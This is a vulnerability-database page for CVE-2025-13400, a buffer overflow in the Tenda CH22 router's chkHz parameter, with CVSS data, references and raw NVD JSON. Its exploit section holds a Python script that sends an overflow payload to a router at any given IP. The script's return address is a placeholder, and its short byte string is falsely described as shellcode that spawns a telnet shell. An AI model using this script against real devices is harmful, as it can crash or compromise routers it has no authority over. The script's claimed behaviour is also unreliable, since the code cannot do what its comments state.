CVE-2025-13400

Description

A vulnerability was detected in Tenda CH22 1.0.0.1. Affected is the function formWrlExtraGet of the file /goform/WrlExtraGet. Performing a manipulation of the argument chkHz results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ch22_firmware:1.0.0.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ch22:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda CH22 1.0.0.1（已确认受影响）

Tenda CH22 其他1.0.x版本（可能受影响）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13400 PoC - Tenda CH22 formWrlExtraGet Buffer Overflow
# Target: Tenda CH22 Router (Firmware 1.0.0.1)
# Vulnerability: Buffer overflow in /goform/WrlExtraGet via chkHz parameter

target_ip = sys.argv[1] if len(sys.argv) > 1 else '192.168.0.1'
target_port = 80

# Generate payload with NOP sled + shellcode + return address
# Adjust the length to trigger buffer overflow
def generate_payload():
    # Padding to overflow the buffer
    padding = b'A' * 1000
    
    # Overwrite return address (adjust based on firmware version)
    # Common gadget: system() -> execute shell commands
    return_addr = b'\x40\x10\x01\x00'  # Example: adjust for actual firmware
    
    # Shellcode: spawn telnetd shell on port 4444
    shellcode = b'\x50\x60\x51\x52\x53\x0c\x01\x01\x01\x01\x01\x01\x01'
    
    payload = padding + return_addr + shellcode
    return payload

def exploit():
    url = f'http://{target_ip}:{target_port}/goform/WrlExtraGet'
    
    # Construct malicious chkHz parameter
    payload = generate_payload()
    
    params = {
        'chkHz': payload.decode('latin-1')
    }
    
    print(f'[*] Sending exploit to {url}')
    print(f'[*] Payload length: {len(payload)} bytes')
    
    try:
        response = requests.get(url, params=params, timeout=10)
        print(f'[+] Request sent successfully')
        print(f'[+] Response status: {response.status_code}')
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_ip>')
        sys.exit(1)
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13400
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13400
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13400/
[4] VulDB https://vuldb.com/cve/CVE-2025-13400
[5] https://github.com/f000x0/cve/issues/14
[6] https://vuldb.com/?ctiid.332926
[7] https://vuldb.com/?id.332926
[8] https://vuldb.com/?submit.692145
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13400", "sourceIdentifier": "[email protected]", "published": "2025-11-19T17:15:47.177", "lastModified": "2026-02-24T07:16:49.813", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Tenda CH22 1.0.0.1. Affected is the function formWrlExtraGet of the file /goform/WrlExtraGet. Performing a manipulation of the argument chkHz results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ch22_firmware:1.0.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "DB66174F-9460-4B60-AC6B-1B8D5700D6A0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ch22:-:*:*:*:*:*:*:*", "matchCriteriaId": "4B2CBA2D-54D0-4860-A4B4-2BF5238E76AE"}]}]}], "references": [{"url": "https://github.com/f000x0/cve/issues/14", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332926", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332926", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.692145", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}